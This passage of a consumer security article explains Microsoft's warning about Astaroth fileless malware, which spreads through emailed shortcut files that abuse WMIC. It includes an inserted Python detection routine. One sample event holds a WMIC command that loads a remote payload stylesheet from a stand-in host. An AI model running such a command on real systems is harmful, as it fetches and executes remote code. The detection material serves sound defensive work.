Microsoft warns about “Astaroth” fileless malware

Microsoft recently raised the alarm over a malware campaign targeting Windows. The culprit this time is a fileless malware strain called Astaroth. We’ve covered fileless malware before, so read up on it if you’re not sure what the term means. In short, the malware lives in your computer’s RAM rather than on the file system, which makes it hard to detect.

Let’s look at why Microsoft is so alarmed about Astaroth and what you need to do to protect yourself.

How is Astaroth spreading?

Astaroth arrives through a .LNK (Windows shortcut) file. The file is hosted on a website, and a link to that site is sent out by email.

If someone clicks the link, the .LNK file runs on Windows. It passes instructions to the Windows Management Instrumentation Command-line (WMIC) tool. Because WMIC is a legitimate program built into Windows, its activity slips past antivirus scanning.

Astaroth then uses its foothold in WMIC to download and run every component it needs to do its job. Once the attack has assembled the complete payload, it is triggered.

Although Astaroth downloads tools to accomplish its task, these are all legitimate system tools that Windows uses in normal operation. That makes the attack harder for antivirus to detect, because it turns core Windows processes against the system itself. This is why it is called a “fileless” attack: no foreign files are downloaded or saved to disk.

This method of attack also falls under a broader category: the “Living off the Land” attack. The name reflects the fact that the malware does not technically introduce any new component to the system; it relies only on tools already present to load and execute the payload.
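The defender’s side of the chain just described (a shortcut launching the built-in WMIC tool, which then fetches further components), as an added example that is not from this article or from Microsoft: a small triage routine run over constructed process-creation events. The event field names, the sample command lines and the example.invalid URL are assumptions made for the example; a Sysmon or EDR process-creation feed would supply equivalent fields.

```python
import re
from typing import Dict, List

# Remote URL on a command line; quotes are excluded so the match stays clean.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
WMIC_IMAGE = "wmic.exe"

# Constructed sample events (not real telemetry): a benign inventory query,
# a WMIC launch from Explorer that pulls a remote resource, and an unrelated
# process. Field names are assumed for this example.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"pid": 4120, "image": r"C:\Windows\System32\wbem\wmic.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "wmic os get caption,version"},
    {"pid": 5312, "image": r"C:\Windows\System32\wbem\wmic.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'wmic os get /format:"https://example.invalid/payload.xsl"'},
    {"pid": 6001, "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe readme.txt"},
]


def is_remote_wmic(event: Dict[str, object]) -> bool:
    """True when WMIC is launched with a remote URL on its command line."""
    image = str(event["image"]).lower()
    if not image.endswith(WMIC_IMAGE):
        return False
    return URL_RE.search(str(event["cmdline"])) is not None


def spawned_by_explorer(event: Dict[str, object]) -> bool:
    """A shortcut clicked by the user is launched by explorer.exe."""
    return str(event["parent"]).lower().endswith("explorer.exe")


def triage(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Return one finding per WMIC launch that reaches out to a URL.

    Severity is raised when the launch came straight from Explorer, which
    matches the shortcut-click delivery described in the article.
    """
    findings = []
    for event in events:
        if not is_remote_wmic(event):
            continue
        url = URL_RE.search(str(event["cmdline"])).group(0)
        severity = "high" if spawned_by_explorer(event) else "medium"
        findings.append({"pid": event["pid"], "severity": severity, "url": url})
    return findings
```

The benign inventory query is ignored because it carries no URL, which keeps the rule from firing on routine administration.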


What is Astaroth doing?

